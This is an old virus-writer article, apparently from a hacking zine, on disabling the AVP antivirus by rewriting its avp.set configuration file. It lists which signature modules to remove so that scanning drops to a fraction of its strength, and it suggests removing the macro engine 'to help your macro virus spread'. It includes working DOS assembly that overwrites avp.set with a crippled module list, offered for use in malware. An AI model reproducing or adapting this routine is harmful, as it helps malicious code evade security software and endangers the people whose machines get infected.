AVP PATCHING 
by Arsonic 

  This article deals with a weakness in avp. Avp has a file in its directory
  called avp.set . This File Contains Information on all the Data Bases to
  Load (eg.. New Updates, etc etc). By Modifying this File u can almost rid
  Avp of all its scan strings.. (taking it down from 12k in strings to 1k)


Here's a Look into all the avp files :P 

Files:
-------------------------------------

AVP.EXE       - program AVP 3.0 b114
AVPLITE.EXE   - program AVPLite 3.0 b114
AVP.LNG       - language support file
AVP.OVL       - overlay file for AVP/AVPL
AVP.SET       - SET file
AVP.KEY       - KEY file
AVP9801.AVC   - rev. 3.0 main anti-virus base *remove this name from the set*
CA.AVC        -          Code Analyzer module *remove this name from the set*
EICAR.AVC     -          EICAR detection module
EXTRACT.AVC   -          Extracting engine
KERNEL.AVC    -          Kernel module
MACRO.AVC     -          macro viruses engine
TROJAN.AVC    -          trojan engine
UNPACK.AVC    -          Unpacking engine
UP*.AVC       -          weekly update modules


After those two filenames are Removed from the Avp.set File, avp will
function at about 1/12 of its efficiency. You could also remove MACRO.AVC
to help your macro virus spread.


Well here's a example of modifying the avp.set file.

It assumes its already in the directory avp was installed.

----EXAMPLE--------
mov ah,3ch                  ;Truncate / Create File
xor cx,cx      
lea dx,AVPSET              
int 21h

xchg bx,ax                  ;put file handle into bx

mov ah,40h                  ;ah/40h Write to File
lea dx,Patch_Start          ;Starting at Patch_Start
mov cx,Patch_End - Patch_Start  ;total bytes to write
int 21h

mov ah,3eh                  ;close file
int 21h

CLOSE:
int 20h                     ;exit to dos

AVPSET DB 'avp.set',0       


Patch_Start:
db 'KERNEL.AVC',13,10
db 'TROJAN.AVC',13,10
db 'UNPACK.AVC',13,10
db 'EXTRACT.AVC',13,10
db 'MAIL.AVC',13,10
db 'EICAR.AVC',13,10
db 'MACRO.AVC',13,10
Patch_End:




